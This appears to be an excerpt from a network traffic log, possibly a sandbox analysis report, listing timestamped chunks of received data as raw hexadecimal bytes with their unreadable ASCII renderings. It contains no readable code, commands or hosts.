                                  2022-11-29 15:55:23 UTC913INData Raw: e0 45 4d e8 5b a0 13 2c 91 28 16 a2 90 ea 1b e4 4d 49 6d b3 f7 c3 23 0e ef 63 ce 30 1f 91 3c 19 00 5d ea e2 72 e2 bd 3e 97 05 8b b4 d4 cd 62 48 b8 a6 b6 13 e4 b0 07 02 61 54 85 63 d2 13 e0 5d eb ae c3 c9 5e 81 92 63 a7 4a 04 07 80 a2 38 96 96 3c c1 d2 fc db 3f 26 1e 7d c1 d5 57 9a 0c e6 d3 86 bd 59 1e 13 33 57 04 fb 6a 83 43 36 33 73 15 5b d9 80 ec 6c 6c 40 f4 40 cb fc 59 5b 3e 15 0a 3e c2 f4 dd 81 76 04 27 64 62 05 73 56 be 57 c2 0c ee aa e8 88 99 20 56 f9 98 4b 78 d5 1d a7 e8 ef 4a 4e 60 56 a5 8b a5 19 e3 d0 d9 51 9d 3c 86 e5 49 a0 ba 1a e9 7b 3c 00 e0 fe e5 63 d3 00 2b 8b 82 03 bc 52 7b e6 13 ac 66 a8 3c a6 80 31 f1 d7 b2 96 7c e6 41 54 a8 fc 06 10 21 ba ab f0 e4 0c bd a8 46 cd 52 ba d8 7b 55 d3 de e6 2b f6 1f 63 ac 15 1a 48 7c 3d a5 6a d6 92 b3 c3 67
                                  Data Ascii: EM[,(MIm#c0<]r>bHaTc]^cJ8<?&}WY3WjC63s[ll@@Y[>>v'dbsVW VKxJN`VQ<I{<c+R{f<1|AT!FR{U+cH|=jg
                                  2022-11-29 15:55:23 UTC929INData Raw: 74 fe 72 35 76 68 50 ff 89 88 88 e3 a1 d1 0a 6c bf 73 35 bf d9 16 80 69 d4 c6 49 df a5 1d 42 b0 c7 c5 0d 92 e5 31 15 93 da fc 5f 90 eb 6d a6 f7 9e eb 99 2f ef 5e cc 19 4a d4 06 fb 59 19 d3 54 49 8c 77 b8 cb ad 6c 48 a0 a2 64 7c c0 69 22 65 d2 05 67 79 de e0 21 13 a9 cd 5a 98 3a 66 b0 71 31 9a f3 c4 c4 8a f5 80 80 20 d1 c0 7f 74 2a d9 51 04 13 ec 92 a0 dc 89 0d 16 fc 43 2b 20 e9 fd df 1c cf 30 41 f4 59 7b 8f 6d b2 03 d9 a4 6a 7d e7 c4 36 ef 95 7d df e0 9f 0f e2 07 01 d6 fd 67 96 35 e8 36 c6 8c 09 cf ff 92 e4 a6 f3 76 7e e8 61 92 3d 8a 44 de c8 da 4c ce 6d 42 30 6d 32 b9 fd 12 8f 1b 2e ae 1b 64 97 70 4c 6e 57 34 f3 da 4d 2d dd e4 95 53 c0 fc 16 d3 44 0e c8 8f aa df f3 9b c1 c3 7f 27 f7 a1 d8 0d 50 36 30 dc 3d 53 b8 69 d6 e8 76 56 eb 4c e7 9d a1 cd cf af 88
                                  Data Ascii: tr5vhPls5iIB1_m/^JYTIwlHd|i"egy!Z:fq1 t*QC+ 0AY{mj}6}g56v~a=DLmB0m2.dpLnW4M-SD'P60=SivVL
                                  2022-11-29 15:55:23 UTC945INData Raw: 18 5d eb 10 48 72 33 fc 3c ef 8e 45 68 fc ae 09 e0 8f 4d 9e 5b ec 9a b7 bd e6 90 1d 15 1f 86 f3 4c e3 02 a0 51 1d e2 17 f8 e2 ee 58 68 49 2c 94 4e ad 85 10 e2 de fc 03 10 36 55 80 7c 45 cd c0 ec 70 5d 85 b9 54 49 a4 ee cc 30 ba e5 a5 f8 ae 69 63 8e bb dd 4a 39 24 ae 16 3c 56 ab 0d 1e 2e 08 1c 8c a3 80 84 34 f9 21 0a 64 fd 6e 4a e1 ce 8d 39 6e 10 41 77 2d 8a f8 7d 0d 6f 5e 44 8b e4 9c 30 95 70 4d 66 81 d9 ca 73 ff 36 96 d9 0e 01 0e ca b6 77 38 f1 df 12 02 b2 d1 81 03 ae c8 31 f2 5d 83 16 f4 92 7b 4e 9b 98 0c 37 2a 23 37 78 d2 99 ac 30 1a 31 6c 74 21 27 92 b3 b1 b3 7c 35 16 1a b1 81 f9 db f2 9a ad 6a 7e bd e4 97 47 31 d8 37 9a 87 f4 0a 61 33 a0 71 27 36 1e e5 6d c3 f5 c7 18 fc e7 7d a2 48 bb 47 5c 58 e6 75 8e 35 e6 fc f4 20 c8 4b db e9 ab ae 57 a1 ab 40 a3
                                  Data Ascii: ]Hr3<EhM[LQXhI,N6U|Ep]TI0icJ9$<V.4!dnJ9nAw-}o^D0pMfs6w81]{N7*#7x01lt!'|5j~G17a3q'6m}HG\Xu5 KW@
                                  2022-11-29 15:55:23 UTC961INData Raw: f7 4e 22 c6 46 b2 47 77 46 ea 05 97 fb e7 52 fb 31 dd 8b 29 0f 77 5a f0 4d dd a1 27 73 a2 73 c2 f9 e7 84 0d ec d5 90 c0 31 db cc 0d b1 70 9e 2d 07 95 19 40 74 92 29 6f 4e 0f e8 7c 05 8e 67 a3 eb fd cd 45 87 6b 97 51 3e 07 8c 49 45 ad 02 23 7c 56 1c 13 a5 11 18 6b 36 ea 06 22 85 33 85 0a ff a5 90 84 77 13 d6 0f b8 1a 01 f3 61 90 ff 0f 12 0d 9b 7c 18 c6 36 f4 c3 a4 a5 0a 33 49 d9 b7 ea ba b0 6e 4e 35 92 b8 dd d1 7d ab 8c 95 21 76 05 d6 29 99 9a f1 b7 45 b9 fb c2 a5 36 80 28 20 31 27 93 ce dc a9 ba 30 13 8c b3 c1 23 8c 9b e6 35 94 c5 12 30 c1 bf 73 8f 1b 18 4d 17 17 19 79 43 ca d0 76 3e a1 c7 0d 04 21 f2 7c 6e 9e 4a c9 33 2a 21 ed 43 81 1c 10 b1 d3 da b0 f1 f3 dd 9d 2a 25 ad be a9 26 33 76 6f cb ef 8a da e4 be e5 14 72 fd 57 86 e2 2b 73 fc e8 5d f2 84 2c 6e
                                  Data Ascii: N"FGwFR1)wZM'ss1p-@t)oN|gEkQ>IE#|Vk6"3wa|63InN5}!v)E6( 1'0#50sMyCv>!|nJ3*!C*%&3vorW+s],n
                                  2022-11-29 15:55:23 UTC977INData Raw: c1 16 99 f2 b9 86 fd bb a2 21 76 52 06 91 d0 70 0e fd 7a 24 06 f7 81 dd 6b 5a d9 9a a6 6d e2 38 1f de f1 3c 57 ab 36 d1 5e 42 e9 ac 43 7e e4 db 92 91 65 23 b4 d4 3f b4 84 36 3d 98 14 50 fc 61 df 84 ce a6 0c b2 5b bf ef 6d 51 c8 c4 bf bb 4a 29 02 29 ff 37 62 76 39 0a 9a bd 6a b8 d2 35 dc e2 ab d1 90 b1 e3 41 6b 27 7c e3 58 3c 1a 50 0f 0b cf bb 77 a7 a2 ea 9b 0c 76 8c e1 f3 16 61 62 fb 06 69 cb 76 89 6e 3e 06 de d3 c6 80 1d e8 29 9f 50 cc ae 7c 5b 50 7b c3 88 ff fc 5a 46 69 d0 7e 61 2b 79 21 d4 f3 30 26 89 83 d5 67 3e 09 f6 49 6d f7 66 66 e7 15 d3 a0 fe c6 84 34 37 ff 52 fe b5 b6 5e be dd fe 61 05 3b 9d d3 00 97 2e de 93 f1 3d e9 2e bf 69 f6 5f 7d c6 e7 cd 53 9c 2e 5a b5 67 9b 07 8f 32 6a 0d ab 02 81 d1 b0 e9 d8 66 b2 6d 53 8a 90 3f 3c 9e e5 60 b6 4c c5 1e
                                  Data Ascii: !vRpz$kZm8<W6^BC~e#?6=Pa[mQJ))7bv9j5Ak'|X<Pwvabivn>)P|[P{ZFi~a+y!0&g>Imff47R^a;.=.i_}S.Zg2jfmS?<`L
                                  2022-11-29 15:55:23 UTC993INData Raw: e3 c3 55 c0 f0 b4 bd e2 0a 00 aa 55 01 91 9d 47 1e 4c 37 83 ae 14 4f b0 55 74 41 8c 0a 00 f6 66 9a 5a dc 83 37 f1 0c 47 55 dc 99 9f 32 c2 90 21 8b 2a aa bf c1 55 71 a2 e3 f9 2a d2 34 a2 70 37 8e 0a ee 74 d4 67 f6 19 f8 61 e2 92 ce a7 fc 41 8d 4d 40 05 c2 64 3c 40 93 13 94 d0 37 6b 13 03 a8 80 8d f9 4d af ec 99 50 9c 88 a6 45 a0 20 5e 6b 3c cc b3 6d a6 ee d1 26 6e 53 77 f4 73 8e 03 39 a4 5b ae 92 43 ac 4e 7d dd bb 3e 22 90 aa 2b 1e ac f3 69 70 51 d2 6d 2b 56 be f9 f0 66 fd 25 f4 93 3e ea 9a 02 ae db 6a 79 a2 10 20 ae 8e 2a 84 2f 1a b3 41 06 10 b0 28 3d 11 57 28 b5 6d ba bb f1 de 57 8c b4 0f 78 3d d8 b9 28 53 a0 33 f8 ec b4 c3 a2 9b e8 f8 b7 d8 fd 15 bc 49 51 fc 70 36 ac 41 70 ee be 37 f0 8b 38 00 2f 7a 13 71 74 9f 29 c9 c3 c8 72 68 36 35 29 e1 5a f1 ad 6e
                                  Data Ascii: UUGL7OUtAfZ7GU2!*Uq*4p7tgaAM@d<@7kMPE ^k<m&nSws9[CN}>"+ipQm+Vf%>jy */A(=W(mWx=(S3IQp6Ap78/zqt)rh65)Zn
                                  2022-11-29 15:55:23 UTC1009INData Raw: d7 6a b3 9c b9 e7 6a 04 be 4f 8e 00 ef 92 b6 24 2a 93 2e 31 b7 48 28 7f 8d 98 4a b6 f6 ea 30 4a 94 1d 91 23 ba 0b a5 6b 26 bd 85 28 49 70 71 ed 92 a1 da 5b 44 a7 88 91 5a 66 f8 8e 0a fc 67 87 85 99 60 6e a3 40 d1 ef fd 7d 51 7d 5f f1 d3 80 5d 3e 5a ac f0 c0 7f 3d 12 99 d1 6c 02 c0 ca 37 51 ec da d3 98 06 72 92 4e 70 dd da 11 9b 5c b5 0c 08 3d 65 64 46 f1 6e a5 7e a5 7c de 59 0f fb 76 17 e9 9e 5e 0d 99 ac 82 fa a6 ae 62 17 7b 0d 0c 25 37 7c a1 f1 cf af 97 67 dd 0d 4b ba 86 06 9c b1 6b 15 9e 75 9a 82 e5 d1 14 60 0d 42 d6 1d 2c b0 01 56 e4 55 9d 83 6a 18 2e cb 35 07 2b b1 e1 0f 50 8c 58 04 2f 43 bc 83 8d bd 25 d0 05 c9 aa 5a f2 65 81 1d 8d 5d 76 a5 1d f2 03 2d 42 9e 25 4e 8d 6b e4 39 b3 bb bc 96 a2 07 8b 55 06 e9 0f 80 d4 66 1f 13 9e 7f 93 4f 98 da f5 86 77
                                  Data Ascii: jjO$*.1H(J0J#k&(Ipq[DZfg`n@}Q}_]>Z=l7QrNp\=edFn~|Yv^b{%7|gKku`B,VUj.5+PX/C%Ze]v-B%Nk9UfOw
                                  2022-11-29 15:55:23 UTC1025INData Raw: 61 1c 9b e1 bc ee 60 89 bc 48 02 22 1e 0f ae 4e 17 e9 cf 68 f7 ab ec 4a 2f e4 9d 75 5d f7 25 ea 26 e3 4f 71 d7 4d 02 8c 8c 93 4d 75 ee f6 2e c8 2b a2 ba fe 3a 42 44 02 0f bd 46 dc 01 94 60 b5 0b 6f 45 7a 70 10 68 f3 8b eb a4 4d 50 7c f1 ba 57 aa 3d c5 92 87 a9 98 bc 1c 7e e5 b6 a1 c3 39 32 61 89 90 0a b5 f0 88 a8 a1 28 ed 6d 44 2c 8c 19 26 d1 0a 8d 4a 7a e9 c2 07 6d 2f a4 8a 37 a7 48 53 14 61 49 94 ce b5 a2 49 74 fa 25 ce db 6a 88 39 a9 4c 9a 45 dd b1 5b 25 64 e4 a3 1f 1c 78 50 14 40 be 9a 2d a2 ec 36 12 8d 53 90 14 56 d6 b4 6a c8 9d 01 d5 58 bf 2f 26 9a c5 5e bf e3 02 00 c3 5d 43 57 89 51 26 5a 87 a5 a7 af fc 73 57 2b 4c 2f 1e 8e 51 da af 44 11 f8 36 91 45 dd fc 95 b6 12 0c 99 ff a3 f2 d2 49 3d a5 57 65 f0 6b 1e 17 2c b4 70 69 25 de ee b5 ea 09 52 35 a0
                                  Data Ascii: a`H"NhJ/u]%&OqMMu.+:BDF`oEzphMP|W=~92a(mD,&Jzm/7HSaIIt%j9LE[%dxP@-6SVjX/&^]CWQ&ZsW+L/QD6EI=Wek,pi%R5
                                  2022-11-29 15:55:23 UTC1041INData Raw: 22 75 b8 33 ba 10 15 82 7e 80 21 7b 9f b1 23 69 1a 8a b7 1a 44 22 9e 31 c5 52 5f ce a3 78 89 43 65 ad 03 20 67 92 ce 8c 04 ae 4d 2b fb 27 1d a4 7f bf e1 42 3e e5 23 56 66 de eb 2e ff 69 0b 29 6f 55 29 a0 6f f2 89 13 4e 46 c9 39 26 8f 1d 37 3a 05 21 b3 00 11 bc bb bb 74 38 ff 5b 81 35 32 84 eb 63 36 df 99 3a cd de 4c 9b 2c 4c 65 00 7e e3 c1 0a e6 4f e6 df 62 2e b7 9e a8 e7 8c af 45 ae ea 1b 4a 96 0a d4 18 3a 0b a2 9b 19 e3 a6 97 9e 05 5c 18 77 54 bc 4f be 8e 0a 75 55 0a 1f f2 7a 4b 6f e6 19 44 59 89 4b ff 5e fa fd 1e a0 b6 c3 77 7a 50 23 a9 04 91 aa 4c 8b 98 dd c8 0d 32 40 25 cd c0 7f 87 3b 8b 19 2f 85 67 67 e7 c3 c5 16 31 9e 29 16 81 35 b4 d7 da 2f 1e 08 53 b3 44 af cd 6d 55 f2 96 9b 6d 9e 28 53 d0 5a 36 56 73 02 7e 01 fc c1 47 83 60 e7 e0 a9 57 1a 7c 45
                                  Data Ascii: "u3~!{#iD"1R_xCe gM+'B>#Vf.i)oU)oNF9&7:!t8[52c6:L,Le~Ob.EJ:\wTOuUzKoDYK^wzP#L2@%;/gg1)5/SDmUm(SZ6Vs~G`W|E
                                  2022-11-29 15:55:23 UTC1057INData Raw: 7a 18 50 5b 7f 2e 58 9d 55 30 10 81 c5 ae 02 e9 49 0f 5c f7 93 9c 0a 88 76 24 a3 5e 21 d7 80 f3 be e8 8d 9f 49 89 30 bf 98 28 52 78 07 bc 73 4e 91 d4 fb 99 48 c8 41 ee 53 db 13 bd 35 7d 80 62 48 88 a9 d7 13 a1 41 5d ff 1d 1d 0d 32 51 63 fa f2 00 11 b5 b8 46 40 b1 4b 0e d5 c8 82 32 92 8e a0 63 32 69 2a b1 38 6a 93 bc 35 5c af 77 8f d7 00 f4 7e b8 dd a8 10 49 c0 e3 5b 6b 86 7f 50 7e ea b7 e3 1b 88 ba 7c 31 8c c7 d9 45 79 3f af d0 57 67 c5 02 3f b6 7b ad 93 78 27 34 3d 1a 33 8b 4e b9 71 71 17 58 df 14 99 15 58 16 d7 ed a2 7a a4 aa 8f 84 ad 6c c2 13 17 bc cd c1 2e b9 b4 ce 5f 02 74 10 73 41 ec c1 86 0d 89 d3 50 4a 2a 4f d1 97 89 d9 ed 0a 16 ce 51 43 ce e4 9b 51 ed a8 6a 0b c0 7c 24 66 c3 f4 b8 3f 8f f6 18 00 03 70 73 e9 80 6e 53 09 6d a5 ac 03 3a 16 c4 9e b9
                                  Data Ascii: zP[.XU0I\v$^!I0(RxsNHAS5}bHA]2QcF@K2c2i*8j5\w~I[kP~|1Ey?Wg?{x'4=3NqqXXzl._tsAPJ*OQCQj|$f?psnSm:
                                  2022-11-29 15:55:23 UTC1073INData Raw: fb 3a e3 0e 09 9f 4e d8 40 20 64 32 5b c4 7a 53 2e 86 9a ac bb 18 c4 b9 6f 9e e2 1c 56 65 c9 ef 91 60 84 91 fb a4 06 5f f2 4f e6 7a 3f a4 11 a8 7b dc 63 bc 32 6b db 84 2e b5 69 c6 55 8e dd 42 66 4f 00 c7 ae dd f3 a7 ea e2 28 51 95 cc c3 d2 ff f8 57 09 80 5f b8 54 26 ea 71 2d 60 0a 00 27 9f 64 58 d5 1a 52 82 5e a7 c3 fc 87 9e e3 d8 27 98 cd aa 15 ff 59 2a e7 cc 27 75 44 fb 65 9e 48 07 fa 62 cd 3b 3e 2c c0 6c 61 6d 5f 2f 88 a1 68 08 8e 28 61 50 b8 31 1d cc 55 a3 cd 26 a4 84 8a 83 6f 73 ac f9 f5 5e d9 15 1a c0 c7 d4 d1 52 de 74 c7 25 89 12 c9 c2 19 36 3c ad 6c e1 cd 37 8e b3 06 fd a8 1e e1 f1 22 e9 da 8a ca 9f e1 72 9f 92 39 27 c4 d8 9e 3b 1b e6 a6 83 6f a5 d3 20 87 ba 7b 22 8b 21 e5 6e 28 e6 1d 49 81 64 36 3a d9 54 37 a4 d4 ae 2a e0 c7 f7 5f 84 68 52 c8 be
                                  Data Ascii: :N@ d2[zS.oVe`_Oz?{c2k.iUBfO(QW_T&q-`'dXR^'Y*'uDeHb;>,lam_/h(aP1U&os^Rt%6<l7"r9';o {"!n(Id6:T7*_hR
                                  2022-11-29 15:55:23 UTC1089INData Raw: c7 b5 5c e9 94 72 ce e6 f6 33 6b c5 6d 40 1f 1a b0 67 79 7d 5e 4d b0 ca f3 51 c1 53 85 4c b5 0b bc d3 2a b4 0a 42 59 2d e3 87 3c 16 6e 46 db d8 0e 72 d1 0a 94 19 63 8d 52 2b cd b7 52 e6 dd 80 80 fc e2 d9 ca cf 30 67 cc 47 01 0c a1 cf 8f c9 55 6b bd eb 00 80 de d3 76 68 6e 3d 1a 32 0f 2b c5 d2 cd 2d 25 4c bc 31 80 76 78 16 f2 b0 a2 97 a0 2e 5d c8 9e 01 e9 5c 5d 71 aa 6d 79 0b 8b b4 08 21 e0 f3 6f 88 87 3b a1 b6 b8 92 cd 7d 71 60 3c f6 60 35 40 f1 45 e7 be 85 eb 73 2e e1 e1 ba 29 4a ca 81 4c 5b f9 b6 eb 21 3f 64 64 dd 1a 8c b3 7a c3 39 30 fd 1a c5 af e4 31 7e bc 6f 7f 66 87 a7 29 51 5e a5 c1 91 6a 20 23 b7 49 4f f5 b9 be 82 9f 17 c0 2a 0c fb e0 8c f3 99 ba 82 07 f9 2f 11 0c 96 23 82 2f ff 09 c4 e5 58 99 5a 87 32 fa e2 1f 2f 40 8c 42 4f 51 02 50 11 ee 07 3d
                                  Data Ascii: \r3km@gy}^MQSL*BY-<nFrcR+R0gGUkvhn=2+-%L1vx.]\]qmy!o;}q`<`5@Es.)JL[!?ddz901~of)Q^j #IO*/#/XZ2/@BOQP=
                                  2022-11-29 15:55:23 UTC1105INData Raw: 76 b0 68 6f ad 59 0e f3 f5 a3 ba 7f 3b 04 c6 92 6e 5e 48 6f 30 80 da eb de 51 f6 b2 13 c3 1f 09 74 35 ad d0 b5 83 de 25 68 2c 18 88 fb fa e7 0d bd 23 8b b1 3f 5b 53 a5 88 b7 c0 2b a4 d3 19 21 5b fa 78 82 07 8a 0d 51 30 52 e2 5c 35 9a 6f 9a c0 bb ff 93 64 33 00 41 07 47 c6 15 80 78 46 fc 74 b5 2d 6b b4 43 9b d9 5a 33 07 23 38 17 30 32 e3 b2 49 c4 70 61 59 40 aa 0d 0e a0 17 23 df 5b 26 ab e8 63 a9 5a c7 46 c3 64 e5 4d 11 1c a9 b4 26 4c f3 13 b9 4b 9d b0 fd 5c 60 ba aa 52 e1 f2 44 fa 20 cc 1f 4f e6 3c d4 f7 5a 46 97 84 c8 09 5c 4e 4a 3a 46 54 d9 af 94 6a 30 0b 17 9f 8a ac 77 ec 5e ce f3 93 f0 39 41 5a 07 14 79 cb 6e c9 5d 7e b4 b7 8c 96 33 fc b7 df 92 c6 db 6c 4e de cc 13 3f 61 16 02 1e 3f db 9f cf 17 16 c2 52 ba ee 00 8c 38 02 82 e0 52 f1 f6 69 b7 0d 5e 12
                                  Data Ascii: vhoY;n^Ho0Qt5%h,#?[S+![xQ0R\5od3AGxFt-kCZ3#802IpaY@#[&cZFdM&LK\`RD O<ZF\NJ:FTj0w^9AZyn]~3lN?a?R8Ri^
                                  2022-11-29 15:55:23 UTC1121INData Raw: 80 ea 0d 78 24 ab 79 11 72 a8 11 3a 56 a0 0e 4b 35 d9 22 1a 27 67 a9 0d 39 58 6d 58 6d ba 9a a4 f4 31 85 62 c7 c9 be ae 4f 16 a3 72 f7 9c 4c 90 44 7e 33 41 c3 c8 b5 00 83 46 46 f5 2f d9 e4 9d 43 61 db 7c 6e 30 4a 47 46 ae 96 86 88 fc f8 c1 ec e4 89 7f cc 71 51 0e 4d 0c f9 1b 10 76 16 f7 2c bc 72 5f 3a bc 81 93 5b a3 66 f1 9b a8 99 db a1 b9 13 a8 1a e6 41 26 7f bb 9b 94 be f0 e9 de 8c 7d b2 88 8b e4 62 75 0d 04 a6 6d cd 73 86 e3 44 d8 7d 84 28 1d 20 1c 4c 2c f7 5f 93 93 8e 74 7e 22 33 3d 4d 30 26 e6 e6 8d e9 fa 35 21 51 65 8a ba 95 ec 82 a9 22 0e 1f bd ea 89 f0 23 1a 1b 49 18 d0 6a c1 2c 02 f6 75 7c c0 41 73 80 11 95 d4 8d 95 32 43 c1 88 84 1a 42 1d 94 e9 e6 c8 20 b3 18 c5 57 d6 3a 76 5a fa fd 78 1c b0 bd c2 5b e4 d4 ac 21 7a 89 ad f6 e7 99 65 61 55 28 51
                                  Data Ascii: x$yr:VK5"'g9XmXm1bOrLD~3AFF/Ca|n0JGFqQMv,r_:[fA&}bumsD}( L,_t~"3=M0&5!Qe"#Ij,u|As2CB W:vZx[!zeaU(Q
                                  2022-11-29 15:55:23 UTC1137INData Raw: 72 ad 71 86 63 ec 5a ad 4a ab ba 96 17 86 f0 9f 12 be c5 27 86 e5 53 43 50 a6 c5 81 0f 41 d7 04 ca ef 82 51 2f 42 b7 46 19 f2 73 ff 01 a8 7a 8e 19 4e 28 68 43 5f dd 0e 00 43 4d 7c 4d 0d 0e 6f 7f b4 29 f8 72 19 3c 11 52 4a 0b 58 15 88 64 16 fd e8 38 41 4b e5 d2 a8 2c ec f7 7e bd 9f fd f5 7d 79 74 0e 31 74 9f 7c b7 a8 75 f9 fb 76 37 08 27 d1 02 c9 29 19 7d 74 fb af ad 2f 3b 56 0a 79 3d 66 d6 87 fc bd 52 ed e6 5d 10 2a fc f8 a6 5d 5e f4 44 46 79 61 72 64 0f ff 04 1f 17 64 9e c1 2b 36 04 63 f9 e9 36 7f 26 26 a4 43 a7 c6 b6 60 ad 4d 6d 0b b7 44 94 62 3a c7 86 13 94 f3 c5 bc da ab b8 9c 57 c4 a9 2d a3 5e 9c 39 84 9e 5b a6 9f 0d 66 af 31 4e 69 f7 bd c5 c5 9a 79 af 0d 31 14 75 0d 60 ce 87 e9 34 33 3a 0c 3e c0 6e 13 d8 28 4d ac 58 e4 e2 d2 05 64 4b 03 88 78 18 c0
                                  Data Ascii: rqcZJ'SCPAQ/BFszN(hC_CM|Mo)r<RJXd8AK,~}yt1t|uv7')}t/;Vy=fR]*]^DFyardd+6c6&&C`MmDb:W-^9[f1Niy1u`43:>n(MXdKx
                                  2022-11-29 15:55:23 UTC1153INData Raw: b0 f5 53 2f 33 d0 b2 91 39 f9 0d fd 8b e3 b3 c1 33 d9 01 6b bf de ec 66 d0 6e 1f 76 9c 63 4f 7b 11 9a 64 4e 31 a0 30 57 38 56 9f b2 04 68 b0 3c bd 32 a0 4d 25 f7 c5 21 29 51 6a e8 f1 f6 f2 f1 7e d7 ae 67 b9 a8 a3 f0 cb 9b df 36 1e 4c 51 43 c3 5e 39 36 c1 7d 49 5b 68 b4 0c 1a 10 74 57 fd 79 b0 e6 54 7a 83 62 cc 33 54 78 31 54 03 dc cc 7a 64 43 4a 3e f4 d0 3a 27 aa 07 4d d3 b5 9d fc 6a 52 13 ba e4 f5 c0 ad 2e 9a c1 10 32 74 ca 72 69 b6 5c c4 26 a4 e4 6e 54 12 34 0b 4f ac 77 6b 10 92 1f df 74 a7 51 0a 04 9e 18 a1 05 ff a2 4b 18 59 a6 0e ab 25 a1 3b b5 e1 e4 0f 94 49 60 9c b1 45 14 ca 97 66 7d 85 d2 d9 b1 08 ed 31 1e 87 71 91 dd 03 39 1e b8 10 34 d6 86 3e 44 fd 94 f1 ca 38 e4 6b 1c 81 d7 93 60 b4 0f 7f eb 0b 77 ae 85 1f 2f b8 f1 26 e9 15 76 18 4e db e8 74 78
                                  Data Ascii: S/393kfnvcO{dN10W8Vh<2M%!)Qj~g6LQC^96}I[htWyTzb3Tx1TzdCJ>:'MjR.2tri\&nT4OwktQKY%;I`Ef}1q94>D8k`w/&vNtx
                                  2022-11-29 15:55:23 UTC1169INData Raw: 1f 6f d8 b0 0d 9e d8 98 0a b0 91 1d 8e 54 86 0f 42 e2 41 95 f6 e7 10 de c9 3a b9 8f 50 cc 07 e0 10 45 af 33 b3 aa 39 0b c0 51 4f 5f 3d dd 99 47 a8 e9 2f 51 8e db c4 3d 00 fc 10 b2 b9 0d 53 19 c4 4e ac d2 47 70 18 6e 58 37 17 12 f9 ce 61 ee 0e b2 47 08 18 6f 8e 2e ed 38 47 3d db e2 47 45 4e 26 c2 78 76 c6 b3 e1 38 ff f5 66 73 d8 45 4c 6a d1 02 c3 35 62 a0 ae d7 86 ac 52 f4 0b 0c 14 f3 c6 35 f3 b8 a5 9e d3 35 ce ad 18 fa f3 03 5a cd d9 ef fe 29 b2 1e f5 7e 71 46 50 ab 8d 9e 36 39 0c e5 40 31 d6 eb 5c d7 ce 45 07 21 db 55 6a c5 0b ac 35 a9 22 4b 27 10 22 d7 0a 7c 64 79 1a 36 a8 52 ad 35 be 43 5a cb 59 75 e9 25 e0 c0 86 74 1d cd 57 20 f2 da af ed 9c de 2a 2c 38 13 6a 94 9f e7 cb 1c cc 4d cb 31 c9 36 67 62 2f 21 69 2c 56 a4 42 74 b6 3d 75 76 c1 25 20 86 39 88
                                  Data Ascii: oTBA:PE39QO_=G/Q=SNGpnX7aGo.8G=GEN&xv8fsELj5bR55Z)~qFP69@1\E!Uj5"K'"|dy6R5CZYu%tW *,8jM16gb/!i,VBt=uv% 9
                                  2022-11-29 15:55:23 UTC1185INData Raw: 8f 5a a2 07 fc bb c1 f4 ac 46 48 1c 29 7e eb db 3f 36 4c 2e a0 15 2b 33 69 6a 8e 88 66 3c d7 f6 69 54 d0 30 30 57 52 4d 1b 5e f4 e9 79 20 90 d1 f1 d3 29 4e 46 1f ba 08 2e 4a 99 12 53 c9 4f 1c 7b 6b 56 be 93 17 60 72 a3 d9 7d 34 a7 d6 cd 79 a4 8e a4 3b 75 2e af be 09 fa 26 8f 50 66 4f 6e de 77 04 a6 7e d2 a8 bc d0 c9 d1 63 22 0c 93 d5 09 8c 9e 4f 86 19 d9 f9 5c 38 8a f2 d7 47 81 54 16 71 d8 f9 d6 7e 46 dc 4e dc d6 19 11 bd 54 a1 5a 4a ae 09 6b c1 8d 76 a2 6f 95 2f a0 5b de 28 45 d9 18 be d1 91 13 68 8c 92 2d 2f 87 e7 fb 58 0d f7 eb 55 79 dc 32 7b 6a 02 1e bb e9 be da 62 12 d5 55 78 b5 30 1c 06 7f 3e 22 37 1d 64 8d b7 1c 01 e3 b5 bf c6 07 b9 04 a0 8f 1e ee 64 a0 c6 e8 3c a9 0d af 3e 5b 45 11 01 dc 7a da 14 46 b5 f6 2e 3c a4 0b 50 89 d6 bc a5 4f 6b a3 95 b8
                                  Data Ascii: ZFH)~?6L.+3ijf<iT00WRM^y )NF.JSO{kV`r}4y;u.&PfOnw~c"O\8GTq~FNTZJkvo/[(Eh-/XUy2{jbUx0>"7dd<>[EzF.<POk
                                  2022-11-29 15:55:23 UTC1201INData Raw: a7 54 d3 c6 b9 3e ee 9d a7 f2 26 76 6d 25 cc 2d da 49 78 97 b7 11 08 b8 01 a7 f7 1b 4d d4 fe 42 d2 05 f4 2b 0d 5f e4 9e 39 b8 a0 6c 0e 08 4c ce bf 4a 2f 68 20 26 89 b0 cf 13 27 4d ad 98 ca f1 d5 9b c5 6b 5b 8c ff f8 f8 e1 b9 15 c5 96 0e a6 ee a8 9a 0c 5d 4f 67 c8 1d 3c fb 58 05 10 04 e4 57 e5 47 d2 11 f2 20 5d bf 6d 94 e2 d5 60 a2 71 db 73 f8 2f 85 ba 30 d9 db 94 e2 f9 9c 4f 42 d7 2b 54 1d 9d 66 59 0f 4d 3a ea dc ba da 28 e5 73 e1 77 e7 c6 7c 54 8b a6 de 74 ff 19 d4 43 2a 21 28 b9 df 34 8a d3 0d 58 ef 3d 43 c7 6c cd d1 2a ea f6 87 ff a9 a4 6e 50 8c 0e eb 43 c6 48 ab ac 99 ae 9a 1c ab a9 ef 8b 25 2f 32 17 ff ef 3e 5e 25 ee 05 fd 41 a0 b8 3b fa 2f 02 b8 96 3b 05 c2 98 f1 1c 4f f0 d4 90 31 d0 7e b4 18 bb fb 68 fd 07 3f 54 f9 3b ab 33 43 ba ef fe 41 95 b9 9e
                                  Data Ascii: T>&vm%-IxMB+_9lLJ/h &'Mk[]Og<XWG ]m`qs/0OB+TfYM:(sw|TtC*!(4X=Cl*nPCH%/2>^%A;/;O1~h?T;3CA
                                  2022-11-29 15:55:23 UTC1217INData Raw: ac 50 bf f1 1a 18 fa 16 92 cb 74 64 d4 6e f8 57 41 91 73 79 3b 0a d2 52 67 83 87 2f 9e 32 68 b1 1a 30 cf df c9 5b d8 88 e4 ba 38 37 d2 33 c7 3e 8a 9b e0 0e b8 dd be 4b 55 f0 84 0e c0 ca 1d ee a3 49 30 4d 33 47 d3 e2 1a 0e 7d b3 b1 65 1c 36 72 ae f4 42 99 ed 38 c7 4f 0e e6 95 e2 fb 06 0d 53 ec 05 a3 f4 4c 4b 21 c5 a1 0b 15 33 a7 bc ca a2 7e 0c 2f 27 09 49 8d fe c1 88 7c 53 75 9e bd 84 9c 3b b1 4d 18 53 9d ad e8 77 f3 9d eb 69 aa 67 97 2d c5 9b 38 57 8b 7e e9 4d 05 48 58 8e bf f9 7d 97 4a 29 ec a7 fe 68 bf 30 c5 c3 93 8d 8b 29 43 3c f1 10 f4 5b 78 ce a3 61 b0 d6 54 74 bd db 7e bd 7e cb c8 07 8e 39 36 94 14 54 22 82 9a 17 03 29 c5 10 66 db 61 5f 71 ef cb 27 60 a6 45 45 c3 9f 69 